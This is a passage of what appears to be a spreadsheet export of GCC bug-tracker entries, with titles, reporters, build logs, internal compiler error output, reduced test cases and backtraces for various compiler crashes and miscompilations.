-march=i686 -DMODULE -I.  -DKBUILD_BASENAME=xl_fm  -c -o xl_fm.o 
xl_fm.c
ld -m elf_i386 -r -o unikey.o xl_keyhooks.o xl_unikey.o 
xl_keymasks.o xl_hzfb.o xl_fm.o
gcc -D__KERNEL__ -I/usr/src/linux-2.4.19.SuSE/include  -Wall 
-Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing 
-fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 
-march=i686 -DMODULE -I.  -DKBUILD_BASENAME=encode_gb  -c -o 
encode-gb.o encode-gb.c
gcc -D__KERNEL__ -I/usr/src/linux-2.4.19.SuSE/include  -Wall 
-Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing 
-fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 
-march=i686 -DMODULE -I.  -DKBUILD_BASENAME=encode_gbk  -c -o 
encode-gbk.o encode-gbk.c
encode-gbk.c:42: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for 
instructions.
make[3]: *** [encode-gbk.o] Error 1
make[3]: Leaving directory 
`/usr/src/linux-2.4.19.SuSE/drivers/video/unicon'
make[2]: *** [_modsubdir_unicon] Error 2
make[2]: Leaving directory 
`/usr/src/linux-2.4.19.SuSE/drivers/video'
make[1]: *** [_modsubdir_video] Error 2
make[1]: Leaving directory `/usr/src/linux-2.4.19.SuSE/drivers'
make: *** [_mod_drivers] Error 2
Release:
unknown
Environment:
Suse 8.1 gcc version 3.2 ftp://ftp.suse.com/pub/people/mantel/next/RPM/kernel-source-2.4.19.SuSE-127.i586.rpm
How-To-Repeat:
use ftp://ftp.suse.com/pub/people/mantel/next/RPM/kernel-source-2.4.19.SuSE-127.i586.rpm with gcc version 3.2 and use make cloneconfig after a new install</t>
  </si>
  <si>
    <t>al</t>
  </si>
  <si>
    <t>GCC-62261</t>
  </si>
  <si>
    <t>[sh64] ICE for negative shift counts</t>
  </si>
  <si>
    <t>This was reported originally by dhowells at #c7 of PR62111.
void foo (unsigned long long x)
{
  bar (x &lt;&lt; -1)
}
causes an error: unrecognizable insn:
(insn 7 6 8 2 (set (reg:DI 160 [ D.1442 ])
        (ashift:DI (reg:DI 161)
            (const_int -1 [0xffffffffffffffff]))) xx.c:3 -1
     (nil))
A possible patch is proposed at #c14 of PR62111.</t>
  </si>
  <si>
    <t>GCC-53812</t>
  </si>
  <si>
    <t>lower_stmt (4.6) verify_gimple_stmt (4.7.0 4.7.1)</t>
  </si>
  <si>
    <t>Created attachment 27719
preprocessed source
The attached code causes internal compiler error for 4.6.3 4.7.0 and 4.7.1.
Same reported location as #53356 but happening in 4.7.1. 
I was unable to reduce to a smaller example that would still expose the problem.
Here is the full output of g++ -v -save-temps (for g++-4.7.1)
Using built-in specs.
COLLECT_GCC=g++-4.7.1
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.7.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure
Thread model: posix
gcc version 4.7.1 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.7.1/cc1plus -E -quiet -v -D_GNU_SOURCE t.cc -mtune=generic -march=x86-64 -fpch-preprocess -o t.ii
ignoring nonexistent directory /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.7.1/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.7.1/../../../../include/c++/4.7.1
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.7.1/../../../../include/c++/4.7.1/x86_64-unknown-linux-gnu
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.7.1/../../../../include/c++/4.7.1/backward
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.7.1/include
 /usr/local/include
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.7.1/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.7.1/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.cc -mtune=generic -march=x86-64 -auxbase t -version -o t.s
GNU C++ (GCC) version 4.7.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.7.1 GMP version 5.0.5 MPFR version 3.1.0 MPC version 0.9
warning: GMP header version 5.0.5 differs from library version 5.0.2.
warning: MPFR header version 3.1.0 differs from library version 3.1.0-p3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.7.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.7.1 GMP version 5.0.5 MPFR version 3.1.0 MPC version 0.9
warning: GMP header version 5.0.5 differs from library version 5.0.2.
warning: MPFR header version 3.1.0 differs from library version 3.1.0-p3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: a7151d2778777271784da9f36a49699e
t.cc: In member function â€˜long int Processor::execute(Program&amp;)â€™:
t.cc:41:10: internal compiler error: in verify_gimple_stmt at tree-cfg.c:4258
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>0ezpz0</t>
  </si>
  <si>
    <t>GCC-42392</t>
  </si>
  <si>
    <t>[LTO] ICE with top level asm</t>
  </si>
  <si>
    <t>I got this error when trying to compile GRUB (latest bzr) on amd64 with -flto:
lto1: internal compiler error: compressed stream: buffer error
The culprit was an acinclude check which can be reduced to the following test case:
asm (.globl start start: nop)
int
main ()
{
}
I'm not sure this can be considered valid C (or at least valid GNU C). I'm tentatively setting ice-on-invalid-code keyword. If I understand correctly it is equivalent to:
void start ()
{
  asm (nop)
}
int
main ()
{
}
In any case I suppose if the code isn't valid GCC ought to fail more gracefully than this so I report anyway in case you'd like to know :-)</t>
  </si>
  <si>
    <t>rmh.gcc</t>
  </si>
  <si>
    <t>GCC-65671</t>
  </si>
  <si>
    <t>Assembly failure (invalid register operand) with -O3 -mavx512vl</t>
  </si>
  <si>
    <t>https://raw.githubusercontent.com/foo86/dcadec/e884d9a0d9127528bdc47c1f8db392363fb50876/libdcadec/idct_float.c
gcc -O3 -mavx512f -mavx512vl -c -o libdcadec/idct_float.o libdcadec/idct_float.c
/tmp/cc3BQBvH.s: Assembler messages:
/tmp/cc3BQBvH.s:1602: Error: invalid register operand for `vextractf128'
/tmp/cc3BQBvH.s:1624: Error: invalid register operand for `vextractf128'
/tmp/cc3BQBvH.s:1670: Error: invalid register operand for `vextractf128'
Lines in question from the resulting assembly file
1602: vextractf128    $0x1 %ymm20 144(%rdx)
1624: vextractf128    $0x1 %ymm24 272(%rdx)
1670: vextractf128    $0x1 %ymm19 400(%rdx)
GCC 5.0.0 (20150329 snapshot) on x86_64-unknown-linux-gnu. Works fine with -mavx512f alone so sounds like the assembler is trying to use VEX coding scheme with the new registers instead of EVEX.</t>
  </si>
  <si>
    <t>GCC-54134</t>
  </si>
  <si>
    <t>[OOP] ICE overriding derived type bound function with allocatable character as result</t>
  </si>
  <si>
    <t>Created attachment 27903
Code that reproduces the ICE with the correct output from two other compilers.
Consider the derived type A with no-pass type bound function which has an allocatable character string as result. Now extend this type A with a type B which overrides that function. The combination of this overriding and the fact that the result is allocatable results in an ICE. Removing the inheritance from A and/or changing the result type to a fixed length character string does not trigger the ICE as shown in the attached example.</t>
  </si>
  <si>
    <t>koen.poppe</t>
  </si>
  <si>
    <t>GCC-4471</t>
  </si>
  <si>
    <t>Bad code generation on Solaris 8 by gcc 3.0.1</t>
  </si>
  <si>
    <t>While compiling the latest release of Portable.NET (0.18) incorrect code is created for file cg_cast.c resulting in linkage errors due to a missing label symbol.
For more details see 
http://gcc.gnu.org/ml/gcc-bugs/2001-10/msg00091.html
I have confirmed that this is a regression from 2.95.x as compiled for Solaris 2.6 (also from sunfreeware)
Release:
gcc 3.0.1 binary from www.sunfreeware.com
Environment:
Solaris 8
Sun Ultra 10 hardware
How-To-Repeat:
Compile cg_cast.i as attached to gcc-bugs email message</t>
  </si>
  <si>
    <t>gchamber</t>
  </si>
  <si>
    <t>GCC-83156</t>
  </si>
  <si>
    <t>[8 regression] gcc.target/i386/pr82361-1.c fail</t>
  </si>
  <si>
    <t>r254874 triggers this:
spawn -ignore SIGHUP /work/gcc/xgcc -B/work/gcc/ /source/gcc/testsuite/gcc.target/i386/pr82361-1.c -B/work/x86_64-pc-linux-gnu/./libmpx/ -B/work/x86_64-pc-linux-gnu/./libmpx/mpxrt -L/work/x86_64-pc-linux-gnu/./libmpx/mpxrt/.libs -B/work/x86_64-pc-linux-gnu/./libmpx/ -B/work/x86_64-pc-linux-gnu/./libmpx/mpxwrap -L/work/x86_64-pc-linux-gnu/./libmpx/mpxwrap/.libs -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -mtune=generic -masm=att -mno-8bit-idiv -ffat-lto-objects -S -o pr82361-1.s
PASS: gcc.target/i386/pr82361-1.c (test for excess errors)
FAIL: gcc.target/i386/pr82361-1.c scan-assembler-not movl       %eax %eax
Option set:
-with-system-zlib --with-demangler-in-ld --with-fpmath=sse --enable-shared --enable-host-shared --enable-clocale=gnu --enable-cloog-backend=isl --enable-languages=cc++fortranjitlto -with-arch=haswell --with-cpu=haswell</t>
  </si>
  <si>
    <t>GCC-53712</t>
  </si>
  <si>
    <t>Does not combine unaligned load with  _mm_cmpistri redundant instruction at -O0</t>
  </si>
  <si>
    <t>Created attachment 27647
Test program triggering the bug - compile with -O0 -msse4.2
Compile the attached program with -msse4.2 -O0
The failing generated code looks like this (-S):
test:
.LFB575:
        .cfi_startproc
        pushq   %rbp
        .cfi_def_cfa_offset 16
        .cfi_offset 6 -16
        movq    %rsp %rbp
        .cfi_def_cfa_register 6
        movq    %rdi -40(%rbp)
        movq    %rsi -48(%rbp)
        movq    -48(%rbp) %rax
        movq    %rax -24(%rbp)
        movq    -24(%rbp) %rax
        movdqu  (%rax) %xmm0
        movdqa  %xmm0 -16(%rbp)
        movq    -40(%rbp) %rax
SEGV =&gt; movdqa  (%rax) %xmm1
        movdqa  -16(%rbp) %xmm0
        pcmpistri       $0 %xmm1 %xmm0
        movl    %ecx %eax
 ? =&gt;   pcmpistrm       $0 %xmm1 %xmm0
        popq    %rbp
        .cfi_def_cfa 7 8
        ret
        .cfi_endproc
This code causes a SEGV at the indicated instruction because %rax has a value of 0x4006d8 which is not aligned by 16
Compiling with -O1 (or higher) fixes the problem:
test:
.LFB643:
        .cfi_startproc
        movdqu  (%rsi) %xmm0
        pcmpistri       $0 (%rdi) %xmm0
        movl    %ecx %eax
        ret
        .cfi_endproc
The root cause is that pcmpistri allows an unaligned memory operand while gcc generates aligned loads for the operands when using -O0.
A second issue is that gcc generates a redundant pcmpistrm instruction at -O0 unclear where this is coming from?
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-redhat-linux/4.6.3/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 4.6.3 20120306 (Red Hat 4.6.3-2) (GCC)</t>
  </si>
  <si>
    <t>jbemmel</t>
  </si>
  <si>
    <t>GCC-48298</t>
  </si>
  <si>
    <t>[F03] User-Defined Derived-Type IO (DTIO)</t>
  </si>
  <si>
    <t>Tracker for implementation of this new feature.</t>
  </si>
  <si>
    <t>GCC-47523</t>
  </si>
  <si>
    <t>Concatenation with deferred length character with lhs variable</t>
  </si>
  <si>
    <t>Hi Paul
sorry to be the first one to find a bug in your really cool
deferred length allocatable scalars.
Test case:
ig25@linux-fd1f:~/Krempel/Char-alloc&gt; cat foo.f90
program main
  implicit none
  character(:) allocatable :: a b
  a = 'a'
  print '(A)' a
  a = a // 'x'
  print '(AA)'a
  print *len(a)
end program main
ig25@linux-fd1f:~/Krempel/Char-alloc&gt; gfortran foo.f90
ig25@linux-fd1f:~/Krempel/Char-alloc&gt; ./a.out
a
a
           2
Output should be
a
ax
           2
The last line shows the length is correct maybe it's just the
interaction with the library.  I will investigate a bit more.</t>
  </si>
  <si>
    <t>GCC-6294</t>
  </si>
  <si>
    <t>private inner interface is flagged illegal</t>
  </si>
  <si>
    <t>private interfaces are illegal but private inner interfaces are ok. gcj doesn't seem to know that.
Release:
gcj3 (GCC) 3.1 20020314 (Red Hat Linux Rawhide 3.1-0.23.1)
Environment:
Red Hat Linux release 7.2.93 (Skipjack)
How-To-Repeat:
Please try to compile the attached class</t>
  </si>
  <si>
    <t>noa</t>
  </si>
  <si>
    <t>GCC-13394</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] noreturn attribute ignored on recursive invokation</t>
  </si>
  <si>
    <t>A real-life program gave me an erroneous warning
'`noreturn' function does return' while it is
impossible that it returns and more importantly:
it indeed doesn't return: it is a logical error
to ignore a recursively invokated functions
noreturn attribute when determining the validness
of that noreturn attribute.
Now a possible warning would be: '`noreturn' function
might caught stack overflow due to self-invokation'
but the keyword there is MIGHT. And I think that
the explicit existance of the `noreturn' attribute
should give us the favour of gcc's doubt: this function
will exit somehow.  It CERTAINLY doesn't return.
Example snippet:
int f(void) __attribute__ ((__noreturn__))
void _exit(int status) __attribute__ ((__noreturn__))
int z = 0
int f()
{
  if (++z &gt; 10)
    _exit(0)
  f()
}
&gt;gcc-cvs-3.4 -Wall -O2 -c noreturn.c
noreturn.cc: In function `int f()':
noreturn.cc:11: warning: `noreturn' function does return
This is a regression: gcc 3.2.3 and all previous versions
of gcc (tried 2.95.3 2.96 3.0.4 3.1.1 and 3.2.x) do not
give the warning.</t>
  </si>
  <si>
    <t>GCC-39162</t>
  </si>
  <si>
    <t>Gcc doesn't warn __m256 when -mavx isn't used</t>
  </si>
  <si>
    <t>bash-3.2$ cat /tmp/x.i 
typedef long long __m256i __attribute__ ((__vector_size__ (32) __may_alias__))
__m256i
bar (__m256i x)
{
  return x
}
bash-3.2$ gcc -S /tmp/x.i 
This is due to type_natural_mode doesn't check 32byte types. If I
add
--- ./i386.c.warn	2009-02-11 06:58:52.000000000 -0800
+++ ./i386.c	2009-02-11 18:03:30.000000000 -0800
@@ -47297 +47297 @@ type_natural_mode (const_tree type)
   if (TREE_CODE (type) == VECTOR_TYPE &amp;&amp; !VECTOR_MODE_P (mode))
     {
       HOST_WIDE_INT size = int_size_in_bytes (type)
-      if ((size == 8 || size == 16)
+      if ((size == 8 || size == 16 || size == 32)
 	  /* ??? Generic code allows us to create width 1 vectors.  Ignore.  */
 	  &amp;&amp; TYPE_VECTOR_SUBPARTS (type) &gt; 1)
 	{
I got
bash-3.2$ ./xgcc -B./ -O2 /tmp/x.i -S
/tmp/x.i: In function â€˜barâ€™:
/tmp/x.i:3: warning: AVX vector argument without AVX enabled changes the ABI
/tmp/x.i:6: internal compiler error: in emit_move_multi_word at expr.c:3317
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
emit_move_multi_word isn't prepared to deal with it.</t>
  </si>
  <si>
    <t>CLASSPATH-49895</t>
  </si>
  <si>
    <t>not working fine</t>
  </si>
  <si>
    <t>asbnbdbdfg hfjksfh kjfhjhgk hgkjhfdg</t>
  </si>
  <si>
    <t>ramarao.ravipati</t>
  </si>
  <si>
    <t>GCC-24572</t>
  </si>
  <si>
    <t>[4.0 regression] ICE in gimplify_expr at gimplify.c:3983</t>
  </si>
  <si>
    <t>seen with 4.0 CVS 20051023 compiling antlr 2.7.5.
/usr/bin/gcj-4.0 -shared --classpath= -fassume-compiled -I./src -I. -I/usr/share/java/antlr.jar -I. -g -O2 -c -o antlr.so /usr/share/java/antlr.jar
antlr/StringUtils.java: In class 'antlr.StringUtils':
antlr/StringUtils.java: In method 'antlr.StringUtils.stripBack(java.lang.Stringjava.lang.String)':
antlr/StringUtils.java:24: internal compiler error: in gimplify_expr at gimplify.c:3983
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
copy of the jar file at http://people.debian.org/~doko/tmp/antlr.jar</t>
  </si>
  <si>
    <t>GCC-10104</t>
  </si>
  <si>
    <t>[Solaris 9] GCC 3.2.2 fails to install due to one missing symlink</t>
  </si>
  <si>
    <t>Reading specs from ./bin/../lib/gcc-lib/sparc-sun-solaris2.9/3.2.2/specs
Configured with: configure --prefix=/global/swdev/compilers/gcc-3.2.2-32bit --enable-languages=c
Thread model: posix
gcc version 3.2.2
SunOS detox 5.9 Generic_112233-03 sun4u sparc SUNWUltra-30
After running the configure and make 'make install' fails in the gcc/mkinstalldirs script. It is looking for install-sh in ./../install-sh -- but something is FUBAR and it doesn't find it. Making a symlink into the /gcc directory to ../install-sh fixes the problem and it installs correctly.
Release:
3.2.2
Environment:
Solaris 9 / 32-bit
How-To-Repeat:
sh configure make  make install</t>
  </si>
  <si>
    <t>GCC-67968</t>
  </si>
  <si>
    <t>go1: internal compiler error: in write_specific_type_functions at go/gofrontend/types.cc:1812</t>
  </si>
  <si>
    <t>Failure occurs when trying to compile Ethereum RPC API.
root@linux05:~/Downloads/go-ethereum# make geth
build/env.sh go install -v -ldflags '-X main.gitCommit 4813a39100dc8dc884b0a68ceae51c2c420f92af' ./cmd/geth
github.com/ethereum/go-ethereum/rpc/api
# github.com/ethereum/go-ethereum/rpc/api
go1: internal compiler error: in write_specific_type_functions at go/gofrontend/types.cc:1812
0x802473df Type::write_specific_type_functions(Gogo* Named_type* std::__cxx11::basic_string std::allocator &gt; const&amp; Function_type* std::__cxx11::basic_string std::allocator &gt; const&amp; Function_type*)
	../../src/gcc/go/gofrontend/types.cc:1812
0x80245b33 Type::specific_type_functions(Gogo* Named_type* Function_type* Function_type* Named_object** Named_object**)
	../../src/gcc/go/gofrontend/types.cc:1791
0x8024639d Type::type_functions(Gogo* Named_type* Function_type* Function_type* Named_object** Named_object**)
	../../src/gcc/go/gofrontend/types.cc:1668
0x8024eff7 Type::type_descriptor_constructor(Gogo* int Named_type* Methods const* bool)
	../../src/gcc/go/gofrontend/types.cc:2011
0x80250b1d Array_type::array_type_descriptor(Gogo* Named_type*)
	../../src/gcc/go/gofrontend/types.cc:6318
0x80248a33 Type::make_type_descriptor_var(Gogo*)
	../../src/gcc/go/gofrontend/types.cc:1218
0x80248e05 Type::type_descriptor_pointer(Gogo* Location)
	../../src/gcc/go/gofrontend/types.cc:1156
0x801c8e6f Type_descriptor_expression::do_get_backend(Translate_context*)
	../../src/gcc/go/gofrontend/expressions.cc:13400
0x801a8efd Interface_value_expression::do_get_backend(Translate_context*)
	../../src/gcc/go/gofrontend/expressions.cc:14023
0x8021ef49 Temporary_statement::do_get_backend(Translate_context*)
	../../src/gcc/go/gofrontend/statements.cc:470
0x801e8d27 Block::get_backend(Translate_context*)
	../../src/gcc/go/gofrontend/gogo.cc:5811
0x8021ea51 Block_statement::do_get_backend(Translate_context*)
	../../src/gcc/go/gofrontend/statements.cc:1802
0x801e8d27 Block::get_backend(Translate_context*)
	../../src/gcc/go/gofrontend/gogo.cc:5811
0x8021ea51 Block_statement::do_get_backend(Translate_context*)
	../../src/gcc/go/gofrontend/statements.cc:1802
0x801e8d27 Block::get_backend(Translate_context*)
	../../src/gcc/go/gofrontend/gogo.cc:5811
0x801ea647 Function::build(Gogo* Named_object*)
	../../src/gcc/go/gofrontend/gogo.cc:5417
0x801ebd7d Named_object::get_backend(Gogo* std::vector &gt;&amp; std::vector &gt;&amp; std::vector &gt;&amp;)
	../../src/gcc/go/gofrontend/gogo.cc:7136
0x801f514d Gogo::write_globals()
	../../src/gcc/go/gofrontend/gogo.cc:1345
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Makefile:9: recipe for target 'geth' failed
make: *** [geth] Error 2</t>
  </si>
  <si>
    <t>gong_su</t>
  </si>
  <si>
    <t>GCC-38502</t>
  </si>
  <si>
    <t>[C++0x] static_assert vs. enums</t>
  </si>
  <si>
    <t>C++0x static asserts cannot be used like so:
#include 
  /// Enumeration for memory_order
  typedef enum memory_order 
    {
      memory_order_relaxed 
      memory_order_consume 
      memory_order_acquire 
      memory_order_release
      memory_order_acq_rel 
      memory_order_seq_cst
    } memory_order
class a
{
  void
  store1(void* __v memory_order __m = memory_order_seq_cst) volatile
  {
    assert(__m == memory_order_acquire)
    assert(__m == memory_order_acq_rel)
    assert(__m == memory_order_consume)
  }
  void
  store2(void* __v const memory_order __m = memory_order_seq_cst)
  {
    static_assert(__m == memory_order_acquire 
		  atomic_address::store requirements not met.)
    static_assert(__m == memory_order_acq_rel 
		  atomic_address::store requirements not met.)
    static_assert(__m == memory_order_consume 
		  atomic_address::store requirements not met.)      
  }
}
g++ -std=gnu++0x says:
 /home/bkoz                                                     %$bld/H-x86-gcc.20081208/bin/g++ -std=gnu++0x -g teststatic_a.cc
teststatic_a.cc: In member function 'void a::store2(void* memory_order)':
teststatic_a.cc:27: error: '__m' cannot appear in a constant-expression
teststatic_a.cc:29: error: '__m' cannot appear in a constant-expression
teststatic_a.cc:31: error: '__m' cannot appear in a constant-expression
There is an interesting comment in the originating boost static assert header 
see 'It's not particularly clear how this applies to enum's or typedefs'
http://www.boost.org/doc/libs/1_37_0/boost/static_assert.hpp
Now for the legalese:
In N2798 
7.1p4:
  In a static_assert-declaration the constant-expression shall be a constant expression (5.19) that can be contextually converted to bool (Clause 4).
5.18p3
  A constant expression is an integral constant expression if it is of integral or enumeration type
From this I expect the above code to be valid and compile w/o error.</t>
  </si>
  <si>
    <t>GCC-60302</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE with c_f_pointer and android cross compiler</t>
  </si>
  <si>
    <t>Dear All
I get an ICE while cross (android ndk-toolchains 4.9c) compiling (gcc-trunk) the following code.
The problem seems to arises in c_f_pointer.
Please let me know if more info is needed.
Thanks
v
cat gcc_reshaper.f90 
module reshaper
  implicit none
contains
  subroutine reshape_inplace_c2_c2(tgt_x new_shape ptr_x)
    use intrinsic :: iso_c_binding
    implicit none
    complex(8) target intent(in) :: tgt_x(1*)
    integer intent(in) :: new_shape(:)
    complex(8) pointer intent(out) :: ptr_x(::)
    type(c_ptr) :: loc_x
    loc_x = c_loc(tgt_x)
    call c_f_pointer(loc_x ptr_x new_shape)
  end subroutine reshape_inplace_c2_c2
end module reshaper
+++++++++
/home/vwe/libs/gcc/test/tmp2/prefix/bin/arm-linux-androideabi-gfortran -c gcc_reshaper.f90 
*** glibc detected *** /home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951: double free or corruption (fasttop): 0x00000000036c5b60 ***
======= Backtrace: =========
/lib64/libc.so.6[0x308147cb3e]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951(_Z21gfc_check_c_f_pointerP8gfc_exprS0_S0_+0x191)[0x577c61]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951(_Z27gfc_intrinsic_sub_interfaceP8gfc_codei+0xee)[0x5b1dee]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951[0x5eef29]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951[0x5f3d7d]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951[0x5f58df]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951[0x5f57e8]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951(_Z11gfc_resolveP13gfc_namespace+0x66)[0x5e66b6]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951(_Z14gfc_parse_filev+0x29b)[0x5dbd9b]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951[0x6199f6]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951[0xa21cbc]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951(_Z11toplev_mainiPPc+0xa18)[0xa23978]
/lib64/libc.so.6(__libc_start_main+0xf5)[0x3081421a05]
/home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951[0x56aa99]
======= Memory map: ========
00400000-01638000 r-xp 00000000 fd:03 7609006                            /home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951
01838000-0183e000 r--p 01238000 fd:03 7609006                            /home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951
0183e000-0184c000 rw-p 0123e000 fd:03 7609006                            /home/vwe/libs/gcc/test/tmp2/prefix/libexec/gcc/arm-linux-androideabi/4.9.0/f951
0184c000-0192d000 rw-p 00000000 00:00 0 
03646000-036e6000 rw-p 00000000 00:00 0                                  [heap]
3080c00000-3080c20000 r-xp 00000000 fd:02 1458068                        /usr/lib64/ld-2.16.so
3080e20000-3080e21000 r--p 00020000 fd:02 1458068                        /usr/lib64/ld-2.16.so
3080e21000-3080e22000 rw-p 00021000 fd:02 1458068                        /usr/lib64/ld-2.16.so
3080e22000-3080e23000 rw-p 00000000 00:00 0 
3081400000-30815ad000 r-xp 00000000 fd:02 1458069                        /usr/lib64/libc-2.16.so
30815ad000-30817ad000 ---p 001ad000 fd:02 1458069                        /usr/lib64/libc-2.16.so
30817ad000-30817b1000 r--p 001ad000 fd:02 1458069                        /usr/lib64/libc-2.16.so
30817b1000-30817b3000 rw-p 001b1000 fd:02 1458069                        /usr/lib64/libc-2.16.so
30817b3000-30817b8000 rw-p 00000000 00:00 0 
3081c00000-3081c03000 r-xp 00000000 fd:02 1458072                        /usr/lib64/libdl-2.16.so
3081c03000-3081e02000 ---p 00003000 fd:02 1458072                        /usr/lib64/libdl-2.16.so
3081e02000-3081e03000 r--p 00002000 fd:02 1458072                        /usr/lib64/libdl-2.16.so
3081e03000-3081e04000 rw-p 00003000 fd:02 1458072                        /usr/lib64/libdl-2.16.so
3082000000-3082100000 r-xp 00000000 fd:02 1458079                        /usr/lib64/libm-2.16.so
3082100000-30822ff000 ---p 00100000 fd:02 1458079                        /usr/lib64/libm-2.16.so
30822ff000-3082300000 r--p 000ff000 fd:02 1458079                        /usr/lib64/libm-2.16.so
3082300000-3082301000 rw-p 00100000 fd:02 1458079                        /usr/lib64/libm-2.16.so
3082c00000-3082c15000 r-xp 00000000 fd:02 1458080                        /usr/lib64/libgcc_s-4.7.2-20121109.so.1
3082c15000-3082e14000 ---p 00015000 fd:02 1458080                        /usr/lib64/libgcc_s-4.7.2-20121109.so.1
3082e14000-3082e15000 r--p 00014000 fd:02 1458080                        /usr/lib64/libgcc_s-4.7.2-20121109.so.1
3082e15000-3082e16000 rw-p 00015000 fd:02 1458080                        /usr/lib64/libgcc_s-4.7.2-20121109.so.1
7fde6cc1d000-7fde6d04d000 rw-p 00000000 00:00 0 
7fde6d04d000-7fde6d074000 rw-p 00000000 00:00 0 
7fff3e292000-7fff3e2b3000 rw-p 00000000 00:00 0                          [stack]
7fff3e329000-7fff3e32b000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
f951: internal compiler error: Aborted
0xa217af crash_signal
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/toplev.c:337
0x577c60 gfc_check_c_f_pointer(gfc_expr* gfc_expr* gfc_expr*)
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/check.c:3956
0x5b1ded gfc_intrinsic_sub_interface(gfc_code* int)
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/intrinsic.c:4377
0x5eef28 resolve_unknown_s
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/resolve.c:3252
0x5eef28 resolve_call
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/resolve.c:3370
0x5f3d7c resolve_code
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/resolve.c:9931
0x5f58de resolve_codes
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/resolve.c:14577
0x5f57e7 resolve_codes
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/resolve.c:14563
0x5e66b5 gfc_resolve
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/resolve.c:14605
